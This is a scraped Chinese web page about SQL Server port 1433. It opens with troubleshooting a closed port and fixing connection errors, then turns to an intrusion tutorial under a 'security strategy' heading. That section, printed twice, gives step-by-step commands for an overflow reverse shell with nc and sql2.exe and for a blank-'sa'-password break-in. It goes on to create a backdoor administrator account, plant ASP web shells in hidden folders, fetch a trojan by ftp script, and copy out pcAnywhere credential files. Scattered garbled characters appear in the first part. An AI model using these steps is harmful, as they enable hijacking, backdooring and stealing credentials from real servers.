关于1433端口
来源:互联网 发布:什么软件打开pdf 编辑:程序博客网 时间:2024/04/29 01:10
一、1433端口的打开:
事故起因,运行iReport1.3.3,测试连接数据库的时候发生错误,“Error socket establish”意思是说错误的端口 于是进入DOS cmd netstat -an 没有发现 TCP 0.0.0.0:1433 断定MSSQL的1433端口没有开启,直接导致了“Error socket establish“错误。 分析 1、sql server服务没有启动;(q;y l M:H Q V A _ Q 检查服务启动,重新启动服务故障依然。 2、修改了端口号; ^0`%l&U S g 打开网络实用工具,检查启用的协议中有TCP/IP协议,查看端口,是1433没错。 3、客户端实用工具作了改动;;AL I!g ~ 打开客户端实用工具,检查协议端口正常,重新创建一个别名,依然不行。 4、安装的问题; P z-E4~ a ] ] 因为没有看他怎么安装的sql,怀疑安装步骤有问题。据张烨这个牛人讲,如果修改了默认的实例名,而又未正确配置,会出现这样的现象。遂卸载重装,一切默认,故障依然。:m#V j K z2S | E j#{ 5、安装版本的问题;2R8n(g6X*h x s,/ 查看安装光盘,是久经考验的安装盘,应该不会出问题。 6、系统的问题; 看不出有什么其它的问题,难道是系统的问题?不过重装系统可太过麻烦,还是先想想其它的办法,看能不能找到问题所在。 H9O U /%J w,j#b 检查系统日志,这个应该是一个比较好的习惯。仔细翻了一遍重新安装后的日志,赫然发现如下内容: /(s5d L)N:n:t 您运行的 Microsoft SQL Server 2000 版本或 Microsoft SQL Server 2000 Desktop Engine (也称为 MSDE) 和 Microsoft Windows Server 2003 家族使用时存在已知的 安全弱点。为了减少计算机被某些病毒的攻击,Microsoft SQL Server 2000,MSDE 或 两者的 TCP/IP 和 UDP 网络端口被禁用。要启用这些端口,您必须从 [url]http://www.microsoft.com/sql/downloads/default.asp[/url] 或 [url]http://www.microsoft.com/china/sql/downloads/default.asp[/url] 安装一个修补程序, 或 Microsoft SQL Server 2000 或 MSDE 的最新服务包。 V2L B W wb6x 有关更多信息,请参阅在 [url]http://go.microsoft.com/fwlink/events.asp[/url] 的帮助和支持 1/.J'm J V'n'N N"K j 终于找到问题了,原来是Windows的一个小小的安全考虑。 如何检查已有MSSQL的版本呢 ? How to find the service pack version installed on SQL Server using 有两种方法: 第一步:使用SQL语句查询 select @@version 查询结果如下: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) 第二步:对照表格查找具体的补丁版本 SQL Server Versions @Version SQL Server Version Released 6.50.201 SQL Server 6.5 RTM 更多的版本对照表: For SQL Server 8 Main Releases All Releases For SQL Server 7 Main Releases For SQL Server 6.5 Main Releases For SQL Server 6 Main Releases |
二、1433端口打开障碍:
如果你的SQL server2000的1433端口未正确开启 1.如果你是win2003,那么一定要安装sql的补丁sp3a 检查你的SQL有没有打补丁,没有的话要打上补丁,检查的方法是在查询分析器中运行: SQL补丁下载: 注意下载后,执行的时候是解压,要在解压后的目录中执行setup.bat才是真正的安装 2.SQL Server连接中的四个最常见错误:
这个是最复杂的,错误发生的原因比较多,需要检查的方面也比较多. 一般说来,有以下几种可能性: 1,SQL Server名称或IP地址拼写有误 要解决这个问题,我们一般要遵循以下的步骤来一步步找出导致错误的原因.
如果 ping <服务器IP地址> 不成功,说明物理连接有问题,这时候要检查硬件设备,如网卡,HUB,路由器等. 如果ping <服务器IP地址> 成功而,ping <服务器名称> 失败 1.使用记事本打开HOSTS文件(一般情况下位于C:/WINNT/system32/drivers/etc). 2.或在 SQL Server 的客户端网络实用工具里面进行配置,后面会有详细说明.
如果命令执行成功,可以看到屏幕一闪之后光标在左上角不停闪动,这说明 SQL Server 服务器工作正常,并且正在监听1433端口的 TCP/IP 连接
点击:程序 -- Microsoft SQL Server -- 服务器网络使用工具 打开该工具后,在"常规"中可以看到服务器启用了哪些协议.
点击:程序 -- Microsoft SQL Server -- 客户端网络使用工具 打开该工具后,在"常规"项中,可以看到客户端启用了哪些协议. 单击"别名"选项卡,还可以为服务器配置别名.服务器的别名是用来连接的名称,
二."无法连接到服务器,用户xxx登陆失败" 该错误产生的原因是由于SQL Server使用了"仅 Windows"的身份验证方式, 1.在服务器端使用企业管理器,并且选择"使用 Windows 身份验证"连接上 SQL Server 2.展开"SQL Server组",鼠标右键点击SQL Server服务器的名称,选择"属性",再选择"安全性"选项卡 在以上解决方法中,如果在第 1 步中使用"使用 Windows 身份验证"连接 SQL Server 失败, 1.点击"开始"-"运行",输入regedit,回车进入注册表编辑器 此时,用户可以成功地使用sa在企业管理器中新建SQL Server注册, 1.打开企业管理器,展开服务器组,然后展开服务器 说明: 以下注册表键:
三.提示连接超时 如果遇到第三个错误,一般而言表示客户端已经找到了这台服务器,并且可以进行连接, 要解决这样的错误,可以修改客户端的连接超时设置. 具体步骤为: 查询分析器中的设置:
|
三、1433端口安全策略:
第一:1433的溢出攻击。在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c://winnt//system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在www.sandflee.net也有下。
1.如何找到sa空密码肉鸡?自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
(>指肉鸡回显下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开 ipc$?
7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光 簧希 野偎? 不得其解。(注:net start命令列表) 我后来换wn2000的cmd下net use ////ip//ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中net use x: ////本机ip//f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器 显示命令成功完成。(lcx注:net命令的详细用法)
10.sqlexe命令行中运行set得知其主页位置在d://inetpub//wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。
11.sqlexe命令行中copy x://cmd.asp d://inetpub//wwwroot,这个目录是肉鸡网站的目录。
12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
md d://inetpub//wwwroot//aspmm
13.sqlexec命令行中copy x://海阳顶端网木马//*.* d://inetpub//wwwroot//aspmm//.再将目录隐藏
attrib +h d://inetpub//wwwroot//aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
15.在自己本机上建立up.txt内容如下:
open ftp1.go.163.com(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c://up.txt
16.sqlexec命令行中ftp -s:c://up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在//winnt//system32//下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c://winnt//Profiles//alluse~1//applic~2//symantec//pcanyw~1//*.cif d://inetpub//wwwroot//.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:
http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。
其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行.
第一:1433的溢出攻击。在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c://winnt//system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在www.sandflee.net也有下。
1.如何找到sa空密码肉鸡?自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
(>指肉鸡回显下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开 ipc$?
7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思 不得其解。(注:net start命令列表) 我后来换wn2000的cmd下net use ////ip//ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中net use x: ////本机ip//f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器 显示命令成功完成。(lcx注:net命令的详细用法)
10.sqlexe命令行中运行set得知其主页位置在d://inetpub//wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。
11.sqlexe命令行中copy x://cmd.asp d://inetpub//wwwroot,这个目录是肉鸡网站的目录。
12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
md d://inetpub//wwwroot//aspmm
13.sqlexec命令行中copy x://海阳顶端网木马//*.* d://inetpub//wwwroot//aspmm//.再将目录隐藏
attrib +h d://inetpub//wwwroot//aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
15.在自己本机上建立up.txt内容如下:
open ftp1.go.163.com(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c://up.txt
16.sqlexec命令行中ftp -s:c://up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在//winnt//system32//下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c://winnt//Profiles//alluse~1//applic~2//symantec//pcanyw~1//*.cif d://inetpub//wwwroot//.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。
其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行.
- 关于1433端口
- 关于端口
- 关于端口
- 关于端口
- 关于端口
- 关于端口
- 关于独占端口
- 关于端口隐藏
- 关于完成端口
- 关于完成端口
- 关于独占端口
- 关于AD所用端口
- 关于端口转发
- 关于端口被占用
- 关于端口占用问题
- 关于端口占用问题
- 关于操作系统中的端口。
- 关于邮箱SSL端口
- 看清--北京林捷货运有限公司
- FORM大比拼
- RMAN备份导致系统性能下降。
- CodeSmith(1):使用和语法简介
- C++ 人物的个人主页
- 关于1433端口
- 6 格式化文本
- CodeSmith(2):对象和控制台
- CodeSmith(3):SchemaExplorer类结构详细介绍
- 染成茜色的坂道 汉化工具开发之技术内幕篇(2)
- 【qianlong88的APUE读书笔记】第二章:uinx标准化及实现
- 学好VC++的十大良好习惯
- CodeSmith(5):其它功能和技巧收集
- CodeSmith(6):错误总结
